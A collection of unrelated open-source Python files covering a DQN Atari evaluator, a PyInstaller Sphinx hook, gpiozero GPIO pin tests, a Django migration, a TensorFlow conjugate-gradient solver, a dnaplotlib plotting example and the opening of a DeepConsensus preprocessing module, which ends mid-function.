<reponame>jvstinian/Python-Reinforcement-Learning-Projects<gh_stars>100-1000 ''' Created on Mar 28, 2018 @author: ywz ''' import os import argparse import tensorflow as tf from q_learning import DQN from config import ATARI, DEMO from environment import new_atari_game, new_demo def main(): parser = argparse.ArgumentParser(description=None) parser.add_argument('-g', '--game', default='demo', type=str, help='Game') parser.add_argument('-d', '--device', default='cpu', type=str, help='Device') args = parser.parse_args() rom = args.game if rom == 'demo': game = new_demo() conf = DEMO else: game = new_atari_game(rom) conf = ATARI model_dir = os.path.join(conf['log_dir'], rom) device = '/{}:0'.format(args.device) with tf.device(device): dqn = DQN(conf, game, model_dir, callback=game.draw) with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess: saver = tf.train.Saver() dqn.load(sess, saver) dqn.evaluate(sess) if __name__ == "__main__": main()
PyInstaller/hooks/hook-sphinx.py
hawkhai/pyinstaller
9,267
12635301
<filename>PyInstaller/hooks/hook-sphinx.py #----------------------------------------------------------------------------- # Copyright (c) 2013-2021, PyInstaller Development Team. # # Distributed under the terms of the GNU General Public License (version 2 # or later) with exception for distributing the bootloader. # # The full license is in the file COPYING.txt, distributed with this software. # # SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception) #----------------------------------------------------------------------------- from PyInstaller.utils.hooks import collect_data_files, collect_submodules, eval_statement # Sphinx consists of several extensions that are lazily loaded. So collect all submodules to ensure we do not miss # any of them. hiddenimports = collect_submodules('sphinx') # For each extension in sphinx.application.builtin_extensions that does not come from the sphinx package, do a # collect_submodules(). We need to do this explicitly because collect_submodules() does not seem to work with # namespace packages, which precludes us from simply doing hiddenimports += collect_submodules('sphinxcontrib') builtin_extensions = list( eval_statement( """ from sphinx.application import builtin_extensions print(builtin_extensions) """ ) ) for extension in builtin_extensions: if extension.startswith('sphinx.'): continue # Already collected hiddenimports += collect_submodules(extension) # This is inherited from an earlier version of the hook, and seems to have been required in Sphinx v.1.3.1 era due to # https://github.com/sphinx-doc/sphinx/blob/b87ce32e7dc09773f9e71305e66e8d6aead53dd1/sphinx/cmdline.py#L173. # It does not hurt to keep it around, just in case. hiddenimports += ['locale'] # Collect all data files: *.html and *.conf files in ``sphinx.themes``, translation files in ``sphinx.locale``, etc. # Also collect all data files for the alabaster theme. datas = collect_data_files('sphinx') + collect_data_files('alabaster')
tests/test_real_pins.py
codecademy-engineering/gpiozero
743
12635302
<gh_stars>100-1000 # vim: set fileencoding=utf-8: # # GPIO Zero: a library for controlling the Raspberry Pi's GPIO pins # # Copyright (c) 2016-2021 <NAME> <<EMAIL>> # Copyright (c) 2020 <NAME> <<EMAIL>> # # SPDX-License-Identifier: BSD-3-Clause import os import errno from time import time, sleep from math import isclose from unittest import mock import pytest import pkg_resources from gpiozero import * from gpiozero.pins.mock import MockConnectedPin, MockFactory, MockSPIDevice from gpiozero.pins.native import NativeFactory from gpiozero.pins.local import LocalPiFactory # This module assumes you've wired the following GPIO pins together. The pins # can be re-configured via the listed environment variables (useful for when # your testing rig requires different pins because the defaults interfere with # attached hardware). TEST_PIN = int(os.environ.get('GPIOZERO_TEST_PIN', '22')) INPUT_PIN = int(os.environ.get('GPIOZERO_TEST_INPUT_PIN', '27')) TEST_LOCK = os.environ.get('GPIOZERO_TEST_LOCK', '/tmp/real_pins_lock') local_only = pytest.mark.skipif( not isinstance(Device.pin_factory, LocalPiFactory), reason="Test cannot run with non-local pin factories") @pytest.fixture( scope='module', params=[ name for name in pkg_resources.\ get_distribution('gpiozero').\ get_entry_map('gpiozero_pin_factories').keys() ]) def pin_factory_name(request): return request.param @pytest.fixture() def pin_factory(request, pin_factory_name): try: factory = pkg_resources.load_entry_point( 'gpiozero', 'gpiozero_pin_factories', pin_factory_name)() except Exception as e: pytest.skip("skipped factory {pin_factory_name}: {e!s}".format( pin_factory_name=pin_factory_name, e=e)) else: yield factory factory.close() @pytest.fixture() def default_factory(request, pin_factory): save_pin_factory = Device.pin_factory Device.pin_factory = pin_factory yield pin_factory Device.pin_factory = save_pin_factory @pytest.fixture(scope='function') def pins(request, pin_factory): # Why return both pins in a single fixture? If we defined one fixture for # each pin then pytest will (correctly) test RPiGPIOPin(22) against # NativePin(27) and so on. This isn't supported, so we don't test it assert not ( {INPUT_PIN, TEST_PIN} & {2, 3, 7, 8, 9, 10, 11}), \ 'Cannot use SPI (7-11) or I2C (2-3) pins for tests' input_pin = pin_factory.pin(INPUT_PIN) input_pin.function = 'input' input_pin.pull = 'down' if isinstance(pin_factory, MockFactory): test_pin = pin_factory.pin(TEST_PIN, pin_class=MockConnectedPin, input_pin=input_pin) else: test_pin = pin_factory.pin(TEST_PIN) yield test_pin, input_pin test_pin.close() input_pin.close() def setup_module(module): start = time() while True: if time() - start > 300: # 5 minute timeout raise RuntimeError('timed out waiting for real pins lock') try: with open(TEST_LOCK, 'x') as f: f.write('Lock file for gpiozero real-pin tests; delete ' 'this if the test suite is not currently running\n') except FileExistsError: print('Waiting for lock before testing real-pins') sleep(0.1) else: break def teardown_module(module): os.unlink(TEST_LOCK) def test_pin_numbers(pins): test_pin, input_pin = pins assert test_pin.number == TEST_PIN assert input_pin.number == INPUT_PIN def test_function_bad(pins): test_pin, input_pin = pins with pytest.raises(PinInvalidFunction): test_pin.function = 'foo' def test_output(pins): test_pin, input_pin = pins test_pin.function = 'output' test_pin.state = 0 assert input_pin.state == 0 test_pin.state = 1 assert input_pin.state == 1 def test_output_with_state(pins): test_pin, input_pin = pins test_pin.output_with_state(0) assert input_pin.state == 0 test_pin.output_with_state(1) assert input_pin.state == 1 def test_pull(pins): test_pin, input_pin = pins input_pin.pull = 'floating' test_pin.function = 'input' test_pin.pull = 'up' assert test_pin.state == 1 assert input_pin.state == 1 test_pin.pull = 'down' assert test_pin.state == 0 assert input_pin.state == 0 def test_pull_bad(pins): test_pin, input_pin = pins test_pin.function = 'input' with pytest.raises(PinInvalidPull): test_pin.pull = 'foo' with pytest.raises(PinInvalidPull): test_pin.input_with_pull('foo') def test_pull_down_warning(pin_factory): if pin_factory.pi_info.pulled_up('GPIO2'): pin = pin_factory.pin(2) try: with pytest.raises(PinFixedPull): pin.pull = 'down' with pytest.raises(PinFixedPull): pin.input_with_pull('down') finally: pin.close() else: pytest.skip("GPIO2 isn't pulled up on this pi") def test_input_with_pull(pins): test_pin, input_pin = pins input_pin.pull = 'floating' test_pin.input_with_pull('up') assert test_pin.state == 1 assert input_pin.state == 1 test_pin.input_with_pull('down') assert test_pin.state == 0 assert input_pin.state == 0 def test_pulls_are_weak(pins): test_pin, input_pin = pins test_pin.function = 'output' for pull in ('floating', 'down', 'up'): input_pin.pull = pull test_pin.state = 0 assert input_pin.state == 0 test_pin.state = 1 assert input_pin.state == 1 def test_bad_duty_cycle(pins): test_pin, input_pin = pins test_pin.function = 'output' try: # NOTE: There's some race in RPi.GPIO that causes a segfault if we # don't pause before starting PWM; only seems to happen when stopping # and restarting PWM very rapidly (i.e. between test cases). if Device.pin_factory.__class__.__name__ == 'RPiGPIOFactory': sleep(0.1) test_pin.frequency = 100 except PinPWMUnsupported: pytest.skip("{test_pin.factory!r} doesn't support PWM".format( test_pin=test_pin)) else: try: with pytest.raises(ValueError): test_pin.state = 1.1 finally: test_pin.frequency = None def test_duty_cycles(pins): test_pin, input_pin = pins test_pin.function = 'output' try: # NOTE: see above if Device.pin_factory.__class__.__name__ == 'RPiGPIOFactory': sleep(0.1) test_pin.frequency = 100 except PinPWMUnsupported: pytest.skip("{test_pin.factory!r} doesn't support PWM".format( test_pin=test_pin)) else: try: for duty_cycle in (0.0, 0.1, 0.5, 1.0): test_pin.state = duty_cycle assert test_pin.state == duty_cycle total = sum(input_pin.state for i in range(20000)) assert isclose(total / 20000, duty_cycle, rel_tol=0.1, abs_tol=0.1) finally: test_pin.frequency = None def test_explicit_factory(no_default_factory, pin_factory): with GPIODevice(TEST_PIN, pin_factory=pin_factory) as device: assert Device.pin_factory is None assert device.pin_factory is pin_factory assert device.pin.number == TEST_PIN def test_envvar_factory(no_default_factory, pin_factory_name): os.environ['GPIOZERO_PIN_FACTORY'] = pin_factory_name assert Device.pin_factory is None try: device = GPIODevice(TEST_PIN) except Exception as e: pytest.skip("skipped factory {pin_factory_name}: {e!s}".format( pin_factory_name=pin_factory_name, e=e)) else: try: group = 'gpiozero_pin_factories' for factory in pkg_resources.iter_entry_points(group, pin_factory_name): factory_class = factory.load() assert isinstance(Device.pin_factory, factory_class) assert device.pin_factory is Device.pin_factory assert device.pin.number == TEST_PIN finally: device.close() Device.pin_factory.close() def test_compatibility_names(no_default_factory): os.environ['GPIOZERO_PIN_FACTORY'] = 'NATIVE' try: device = GPIODevice(TEST_PIN) except Exception as e: pytest.skip("skipped factory {pin_factory_name}: {e!s}".format( pin_factory_name=pin_factory_name, e=e)) else: try: assert isinstance(Device.pin_factory, NativeFactory) assert device.pin_factory is Device.pin_factory assert device.pin.number == TEST_PIN finally: device.close() Device.pin_factory.close() def test_bad_factory(no_default_factory): os.environ['GPIOZERO_PIN_FACTORY'] = 'foobarbaz' # Waits for someone to implement the foobarbaz pin factory just to # mess with our tests ... with pytest.raises(BadPinFactory): GPIODevice(TEST_PIN) def test_default_factory(no_default_factory): assert Device.pin_factory is None os.environ.pop('GPIOZERO_PIN_FACTORY', None) try: device = GPIODevice(TEST_PIN) except Exception as e: pytest.skip("no default factories") else: try: assert device.pin_factory is Device.pin_factory assert device.pin.number == TEST_PIN finally: device.close() Device.pin_factory.close() def test_spi_init(pin_factory): with pin_factory.spi() as intf: assert isinstance(intf, SPI) assert repr(intf) == 'SPI(clock_pin=11, mosi_pin=10, miso_pin=9, select_pin=8)' intf.close() assert intf.closed assert repr(intf) == 'SPI(closed)' with pin_factory.spi(port=0, device=1) as intf: assert repr(intf) == 'SPI(clock_pin=11, mosi_pin=10, miso_pin=9, select_pin=7)' with pin_factory.spi(clock_pin=11, mosi_pin=10, select_pin=8) as intf: assert repr(intf) == 'SPI(clock_pin=11, mosi_pin=10, miso_pin=9, select_pin=8)' # Ensure we support "partial" SPI where we don't reserve a pin because # the device wants it for general IO (see SPI screens which use a pin # for data/commands) with pin_factory.spi(clock_pin=11, mosi_pin=10, miso_pin=None, select_pin=7) as intf: assert isinstance(intf, SPI) with pin_factory.spi(clock_pin=11, mosi_pin=None, miso_pin=9, select_pin=7) as intf: assert isinstance(intf, SPI) with pin_factory.spi(shared=True) as intf: assert isinstance(intf, SPI) with pytest.raises(ValueError): pin_factory.spi(port=1) with pytest.raises(ValueError): pin_factory.spi(device=2) with pytest.raises(ValueError): pin_factory.spi(port=0, clock_pin=12) with pytest.raises(ValueError): pin_factory.spi(foo='bar') def test_spi_hardware_conflict(default_factory): with LED(11) as led: with pytest.raises(GPIOPinInUse): Device.pin_factory.spi(port=0, device=0) with Device.pin_factory.spi(port=0, device=0) as spi: with pytest.raises(GPIOPinInUse): LED(11) def test_spi_hardware_same_bus(default_factory): with Device.pin_factory.spi(device=0) as intf: with pytest.raises(GPIOPinInUse): Device.pin_factory.spi(device=0) with Device.pin_factory.spi(device=1) as another_intf: assert intf._bus is another_intf._bus def test_spi_hardware_shared_bus(default_factory): with Device.pin_factory.spi(device=0, shared=True) as intf: with Device.pin_factory.spi(device=0, shared=True) as another_intf: assert intf is another_intf @local_only def test_spi_hardware_read(default_factory): with mock.patch('gpiozero.pins.local.SpiDev') as spidev: spidev.return_value.xfer2.side_effect = lambda data: list(range(10))[:len(data)] with Device.pin_factory.spi() as intf: assert intf.read(3) == [0, 1, 2] assert intf.read(6) == list(range(6)) @local_only def test_spi_hardware_write(default_factory): with mock.patch('gpiozero.pins.local.SpiDev') as spidev: spidev.return_value.xfer2.side_effect = lambda data: list(range(10))[:len(data)] with Device.pin_factory.spi() as intf: assert intf.write([0, 1, 2]) == 3 assert spidev.return_value.xfer2.called_with([0, 1, 2]) assert intf.write(list(range(6))) == 6 assert spidev.return_value.xfer2.called_with(list(range(6))) @local_only def test_spi_hardware_modes(default_factory): with mock.patch('gpiozero.pins.local.SpiDev') as spidev: spidev.return_value.mode = 0 spidev.return_value.lsbfirst = False spidev.return_value.cshigh = True spidev.return_value.bits_per_word = 8 with Device.pin_factory.spi() as intf: assert intf.clock_mode == 0 assert not intf.clock_polarity assert not intf.clock_phase intf.clock_polarity = False assert intf.clock_mode == 0 intf.clock_polarity = True assert intf.clock_mode == 2 intf.clock_phase = True assert intf.clock_mode == 3 assert not intf.lsb_first assert intf.select_high assert intf.bits_per_word == 8 intf.select_high = False intf.lsb_first = True intf.bits_per_word = 12 assert not spidev.return_value.cshigh assert spidev.return_value.lsbfirst assert spidev.return_value.bits_per_word == 12 intf.rate = 1000000 assert intf.rate == 1000000 intf.rate = 500000 assert intf.rate == 500000 # XXX Test two simultaneous SPI devices sharing clock, MOSI, and MISO, with # separate select pins (including threaded tests which attempt simultaneous # reading/writing)
src/olympia/addons/migrations/0021_auto_20200909_1302.py
osamamagdy/addons-server
843
12635304
# Generated by Django 2.2.16 on 2020-09-09 13:02 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ("addons", "0020_auto_20200805_1350"), ] operations = [ migrations.AlterField( model_name="addon", name="total_downloads", field=models.PositiveIntegerField( db_column="totaldownloads", default=0, null=True ), ), ]
tensorflow/contrib/solvers/python/ops/linear_equations.py
AlexChrisF/udacity
522
12635305
<reponame>AlexChrisF/udacity # Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Solvers for linear equations.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections from tensorflow.contrib.solvers.python.ops import util from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.framework import ops from tensorflow.python.ops import array_ops from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import math_ops def conjugate_gradient(operator, rhs, tol=1e-4, max_iter=20, name="conjugate_gradient"): r"""Conjugate gradient solver. Solves a linear system of equations `A*x = rhs` for selfadjoint, positive definite matrix `A` and righ-hand side vector `rhs`, using an iterative, matrix-free algorithm where the action of the matrix A is represented by `operator`. The iteration terminates when either the number of iterations exceeds `max_iter` or when the residual norm has been reduced to `tol` times its initial value, i.e. \\(||rhs - A x_k|| <= tol ||rhs||\\). Args: operator: An object representing a linear operator with attributes: - shape: Either a list of integers or a 1-D `Tensor` of type `int32` of length 2. `shape[0]` is the dimension on the domain of the operator, `shape[1]` is the dimension of the co-domain of the operator. On other words, if operator represents an N x N matrix A, `shape` must contain `[N, N]`. - dtype: The datatype of input to and output from `apply`. - apply: Callable object taking a vector `x` as input and returning a vector with the result of applying the operator to `x`, i.e. if `operator` represents matrix `A`, `apply` should return `A * x`. rhs: A rank-1 `Tensor` of shape `[N]` containing the right-hand size vector. tol: A float scalar convergence tolerance. max_iter: An integer giving the maximum number of iterations. name: A name scope for the operation. Returns: output: A namedtuple representing the final state with fields: - i: A scalar `int32` `Tensor`. Number of iterations executed. - x: A rank-1 `Tensor` of shape `[N]` containing the computed solution. - r: A rank-1 `Tensor` of shape `[M]` containing the residual vector. - p: A rank-1 `Tensor` of shape `[N]`. `A`-conjugate basis vector. - gamma: \\(||r||_2^2\\) """ # ephemeral class holding CG state. cg_state = collections.namedtuple("CGState", ["i", "x", "r", "p", "gamma"]) def stopping_criterion(i, state): return math_ops.logical_and(i < max_iter, state.gamma > tol) # TODO(rmlarsen): add preconditioning def cg_step(i, state): z = operator.apply(state.p) alpha = state.gamma / util.dot(state.p, z) x = state.x + alpha * state.p r = state.r - alpha * z gamma = util.l2norm_squared(r) beta = gamma / state.gamma p = r + beta * state.p return i + 1, cg_state(i + 1, x, r, p, gamma) with ops.name_scope(name): n = operator.shape[1:] rhs = array_ops.expand_dims(rhs, -1) gamma0 = util.l2norm_squared(rhs) tol = tol * tol * gamma0 x = array_ops.expand_dims( array_ops.zeros( n, dtype=rhs.dtype.base_dtype), -1) i = constant_op.constant(0, dtype=dtypes.int32) state = cg_state(i=i, x=x, r=rhs, p=rhs, gamma=gamma0) _, state = control_flow_ops.while_loop(stopping_criterion, cg_step, [i, state]) return cg_state( state.i, x=array_ops.squeeze(state.x), r=array_ops.squeeze(state.r), p=array_ops.squeeze(state.p), gamma=state.gamma)
gallery/scatter_annotate/scatter_annotate.py
zachfox/dnaplotlib
267
12635375
#!/usr/bin/env python """ Annotation of standard scatter plot with genetic constructs """ import numpy as np import matplotlib.pyplot as plt import dnaplotlib as dpl import csv __author__ = '<NAME> <<EMAIL>>, Voigt Lab, MIT' __license__ = 'MIT' __version__ = '1.0' # Read some data points for the scatter plot filename_in ='data_points.txt' data_reader = csv.reader(open(filename_in, 'rU'), delimiter=' ') x = [] y = [] for row in data_reader: y.append( float(row[1]) ) x.append( float(row[2]) ) # Generate the scatter plot fig = plt.figure(figsize=(2.8,2.32)) ax = plt.subplot(1, 1, 1) ax.set_yscale('log') ax.set_xlim([0.85,1.05]) ax.set_ylim([1,500]) ax.set_xticks([0.85, 0.9, 0.95, 1.0, 1.05]) ax.tick_params(axis='y', labelsize=8) ax.tick_params(axis='x', labelsize=8) ax.spines['right'].set_visible(False) ax.spines['top'].set_visible(False) ax.yaxis.set_ticks_position('left') ax.xaxis.set_ticks_position('bottom') plt.xlabel('Parameter 1', fontsize=8, labelpad=0) plt.ylabel('Parameter 2', fontsize=8, labelpad=0) ax.tick_params(axis='y', which='major', pad=1) plt.scatter(x, y, c='none', s=6, edgecolor=(0.5,0.5,0.5), lw = 0.8) #(0.38, 0.65, 0.87) # Add arrows to the constructs plt.annotate( '', xy = (0.8785, 323.5), xytext = (25, 5), textcoords = 'offset points', ha = 'right', va = 'bottom', bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.5), arrowprops = dict(arrowstyle = '->', linewidth=1.0, connectionstyle = 'arc3,rad=0')) plt.annotate( '', xy = (0.977, 34), xytext = (20, 14), textcoords = 'offset points', ha = 'right', va = 'bottom', bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.5), arrowprops = dict(arrowstyle = '->', linewidth=1.0, connectionstyle = 'arc3,rad=0')) plt.annotate( '', xy = (0.982, 3.3), xytext = (22, 10), textcoords = 'offset points', ha = 'right', va = 'bottom', bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.5), arrowprops = dict(arrowstyle = '->', linewidth=1.0, connectionstyle = 'arc3,rad=0')) # Color maps (let's make sure we use similar colors) col_map = {} col_map['black'] = (0.00, 0.00, 0.00) col_map['white'] = (1.00, 1.00, 1.00) col_map['red'] = (0.95, 0.30, 0.25) col_map['green'] = (0.38, 0.82, 0.32) col_map['blue'] = (0.38, 0.65, 0.87) col_map['orange'] = (1.00, 0.75, 0.17) col_map['purple'] = (0.55, 0.35, 0.64) col_map['yellow'] = (0.98, 0.97, 0.35) # Global line width lw = 1.0 # Define design 1 p1_1 = {'type':'Promoter', 'name':'pA', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black']}} rbs_1_1 = {'type':'RBS', 'name':'rbs_f', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-6, 'x_extent':6}} gA_1 = {'type':'CDS', 'name':'gA', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['red'], 'edgecolor':col_map['red'], 'x_extent':24, 'label':'A', 'label_style':'italic', 'label_color':(1,1,1), 'label_x_offset':-3, 'label_y_offset':-1}} rbs_1_2 = {'type':'RBS', 'name':'rbs_r', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':2, 'x_extent':6}} gB_1 = {'type':'CDS', 'name':'gB', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['blue'], 'edgecolor':col_map['blue'], 'x_extent':24, 'label':'B', 'label_style':'italic', 'label_color':(1,1,1), 'label_x_offset':-3, 'label_y_offset':-1}} t1_1 = {'type':'Terminator', 'name':'t0', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-1}} design1 = [p1_1, rbs_1_1, gA_1, rbs_1_2, gB_1, t1_1] # Define design 2 t1_2 = {'type':'Terminator', 'name':'t0', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-1}} gA_2 = {'type':'CDS', 'name':'gA', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['red'], 'edgecolor':col_map['red'], 'x_extent':24, 'label':'A', 'label_style':'italic', 'label_color':(1,1,1), 'label_x_offset':2, 'label_y_offset':-1}} rbs_1_2 = {'type':'RBS', 'name':'rbs_f', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-6, 'x_extent':6}} p1_2 = {'type':'Promoter', 'name':'pA', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['black']}} p2_2 = {'type':'Promoter', 'name':'pA', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black']}} rbs_2_2 = {'type':'RBS', 'name':'rbs_r', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-6, 'x_extent':6}} gB_2 = {'type':'CDS', 'name':'gB', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['blue'], 'edgecolor':col_map['blue'], 'x_extent':24, 'label':'B', 'label_style':'italic', 'label_color':(1,1,1), 'label_x_offset':-3, 'label_y_offset':-1}} t2_2 = {'type':'Terminator', 'name':'t0', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-1}} design2 = [t1_2, gA_2, rbs_1_2, p1_2, p2_2, rbs_2_2, gB_2, t2_2] # Define design 3 p1_3 = {'type':'Promoter', 'name':'pA', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black']}} rbs_1_3 = {'type':'RBS', 'name':'rbs_r', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-6, 'x_extent':6}} gA_3 = {'type':'CDS', 'name':'gB', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['red'], 'edgecolor':col_map['red'], 'x_extent':24, 'label':'A', 'label_style':'italic', 'label_color':(1,1,1), 'label_x_offset':-3, 'label_y_offset':-1}} t1_3 = {'type':'Terminator', 'name':'t0', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-1}} t2_3 = {'type':'Terminator', 'name':'t0', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-1}} gB_3 = {'type':'CDS', 'name':'gA', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['blue'], 'edgecolor':col_map['blue'], 'x_extent':24, 'label':'B', 'label_style':'italic', 'label_color':(1,1,1), 'label_x_offset':0, 'label_y_offset':-1}} rbs_2_3 = {'type':'RBS', 'name':'rbs_f', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-6, 'x_extent':6}} p2_3 = {'type':'Promoter', 'name':'pA', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['black']}} design3 = [p1_3, rbs_1_3, gA_3, t1_3, t2_3, gB_3, rbs_2_3, p2_3] # Set up the axes for the genetic constructs ax_dna1 = plt.axes([0.35, 0.83, 0.35, 0.12]) ax_dna2 = plt.axes([0.61, 0.65, 0.4, 0.12]) ax_dna3 = plt.axes([0.58, 0.32, 0.4, 0.12]) # Create the DNAplotlib renderer dr = dpl.DNARenderer() # Redender the DNA to axis start, end = dr.renderDNA(ax_dna1, design1, dr.SBOL_part_renderers()) ax_dna1.set_xlim([start, end]) ax_dna1.set_ylim([-15,15]) ax_dna1.set_aspect('equal') ax_dna1.set_xticks([]) ax_dna1.set_yticks([]) ax_dna1.axis('off') start, end = dr.renderDNA(ax_dna2, design2, dr.SBOL_part_renderers()) ax_dna2.set_xlim([start, end]) ax_dna2.set_ylim([-15,15]) ax_dna2.set_aspect('equal') ax_dna2.set_xticks([]) ax_dna2.set_yticks([]) ax_dna2.axis('off') start, end = dr.renderDNA(ax_dna3, design3, dr.SBOL_part_renderers()) ax_dna3.set_xlim([start, end]) ax_dna3.set_ylim([-15,15]) ax_dna3.set_aspect('equal') ax_dna3.set_xticks([]) ax_dna3.set_yticks([]) ax_dna3.axis('off') # Sort out subplot spacing plt.subplots_adjust(hspace=0.01, left=0.13, right=0.95, top=0.93, bottom=0.13) # Save the figure fig.savefig('scatter_annotate.pdf', transparent=True) fig.savefig('scatter_annotate.png', dpi=300) # Clear the plotting cache plt.close('all')
deepconsensus/preprocess/preprocess.py
pichuan/deepconsensus
106
12635376
<filename>deepconsensus/preprocess/preprocess.py # Copyright (c) 2021, Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without modification, # are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # 3. Neither the name of Google Inc. nor the names of its contributors # may be used to endorse or promote products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON # ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. r"""Performs preprocessing of subread-aligned data. Usage: deepconsensus preprocess \ --subreads_to_ccs=subreads_to_ccs.bam \ --ccs_fasta=ccs_fasta.fasta \ --truth_bed=truth_bed.bed \ --truth_to_ccs=truth_to_ccs.bam \ --truth_split=truth_split.tsv \ [email protected] \ --cpus=4 """ import collections import functools import json import multiprocessing import multiprocessing.pool import os import time from typing import Dict, List from absl import flags from absl import logging import tensorflow as tf from deepconsensus.preprocess import utils from deepconsensus.utils import dc_constants from absl import app AsyncResult = multiprocessing.pool.AsyncResult Queue = multiprocessing.Queue Issue = dc_constants.Issue FLAGS = flags.FLAGS flags.DEFINE_string('subreads_to_ccs', None, 'Input BAM containing subreads aligned to ccs.') flags.DEFINE_string('ccs_fasta', None, 'Input FASTA containing ccs sequences.') flags.DEFINE_string( 'output', None, ('Output filename. If training, use @split wildcard for split name. ' 'For example: [email protected]' 'The output filename must end in .tfrecord.gz')) flags.DEFINE_string('truth_to_ccs', None, 'Input truth bam aligned to ccs.') flags.DEFINE_string('truth_bed', None, 'Input truth bedfile.') # TODO TODO flags.DEFINE_string('truth_split', None, 'Input file defining train/eval/test splits.') flags.DEFINE_integer( 'cpus', multiprocessing.cpu_count(), 'Number of worker processes to use. Use 0 to disable parallel processing. ' 'Minimum of 2 CPUs required for parallel processing.', short_name='j') flags.DEFINE_integer('bam_reader_threads', 8, 'Number of decompression threads to use.') flags.DEFINE_integer('limit', 0, 'Limit processing to n ZMWs.') def register_required_flags(): flags.mark_flags_as_required([ 'subreads_to_ccs', 'ccs_fasta', 'output', ]) def trace_exception(f): """Decorator to catch errors run in multiprocessing processes.""" @functools.wraps(f) def wrap(*args, **kwargs): try: result = f(*args, **kwargs) return result except: # pylint: disable=bare-except logging.exception('Error in function %s.', f.__name__) raise Exception('Error in worker process') return wrap def make_dirs(path): # Create directories for filename tf.io.gfile.makedirs(os.path.dirname(path)) def setup_writers(output_fname: str, splits: List[str]) -> Dict[str, tf.io.TFRecordWriter]: """Creates tf writers for split set.""" tf_writers = {} tf_ops = tf.io.TFRecordOptions(compression_type='GZIP') for split in splits: split_fname = output_fname.replace('@split', split) # Create subdirs if necessary. make_dirs(split_fname) tf_writers[split] = tf.io.TFRecordWriter(split_fname, tf_ops) return tf_writers def write_tf_record(tf_example_str_set: List[bytes], split: str, tf_writers: Dict[str, tf.io.TFRecordWriter]): """Writes tf examples to a split.""" for tf_example_str in tf_example_str_set: tf_writers[split].write(tf_example_str) tf_writers[split].flush() @trace_exception def tf_record_writer(output_fname: str, splits: List[str], queue: Queue) -> bool: """tf_record writing worker.""" tf_writers = setup_writers(output_fname, splits) while True: tf_example_str_set, split = queue.get() if split == 'kill': break write_tf_record(tf_example_str_set, split, tf_writers) for writer in tf_writers.values(): writer.close() return True @trace_exception def process_subreads(subreads: List[utils.Read], ccs_seqname: str, dc_config: utils.DcConfig, split: str, queue: Queue, local=False): """Subread processing worker.""" tf_out = [] dc_example = utils.subreads_to_dc_example(subreads, ccs_seqname, dc_config) for example in dc_example.iter_examples(): tf_out.append(example.tf_example().SerializeToString()) dc_example.counter[f'n_examples_{split}'] += len(tf_out) dc_example.counter['n_examples'] += len(tf_out) if local: return tf_out, split, dc_example.counter else: queue.put([tf_out, split]) # Return a counter object for each ZMW. return dc_example.counter def clear_tasks(tasks: List[AsyncResult], main_counter: collections.Counter) -> List[AsyncResult]: """Clear successful tasks and log result.""" for task in 